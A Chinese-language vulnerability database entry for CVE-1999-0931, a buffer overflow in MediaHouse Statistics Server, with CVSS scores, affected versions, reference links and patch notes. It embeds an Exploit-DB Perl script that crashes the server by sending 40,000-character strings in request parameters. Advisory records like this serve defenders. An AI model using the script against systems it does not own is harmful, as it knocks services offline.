CVE-1999-0931
CVSS5.0
发布时间 :1999-09-30 00:00:00
修订时间 :2008-09-09 08:36:13
NMCOE    

[原文]Buffer overflow in Mediahouse Statistics Server allows remote attackers to execute commands.


[CNNVD]MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞(CNNVD-199909-058)

        MediaHouse统计服务器中存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mediahouse_software:statistics_server:4.28
cpe:/a:mediahouse_software:statistics_server:5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0931
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0931
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-058
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/734
(UNKNOWN)  BID  734

- 漏洞信息

MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞
中危 缓冲区溢出
1999-09-30 00:00:00 2005-05-02 00:00:00
远程※本地  
        MediaHouse统计服务器中存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行命令。

- 公告与补丁

        MediaHouse has addressed this issue in Statistics Server 5.03:
        MediaHouse Software Statistics Server 4.28
        
        MediaHouse Software Statistics Server 5.1
        

- 漏洞信息 (19562)

MediaHouse Software Statistics Server 4.28/5.1 "Server ID" Buffer Overflow Vulnerability (EDBID:19562)
windows dos
1999-09-30 Verified
0 Per Bergehed
N/A [点击下载]
source: http://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code. 

#!/usr/bin/perl

###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed (per_bergehed@hotmail.com)
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#

use IO::Socket;

print "############################################################\n";
print "# Simple DoS-attack against the Mediahouse Statistics Server\n";
print "# Tested with version 4.28 & 5.01\n";
print "\n";

if ($#ARGV != 0) 
{
        die "-> Please give the host address as argument.\n"
}

opensocket ("\n");
print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0\n\n";
print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\n\n";
close $remote;

opensocket ("\n-> The server seemed to be vulnerable to this attack\n");
close $remote;
die "-> The server does not seem to be vulnerable to this attack\n";

sub opensocket 
{
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "# Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF		

- 漏洞信息

1119
MediaHouse Statistics Server server ID Login Page Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

1999-09-30 Unknow
1999-09-30 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站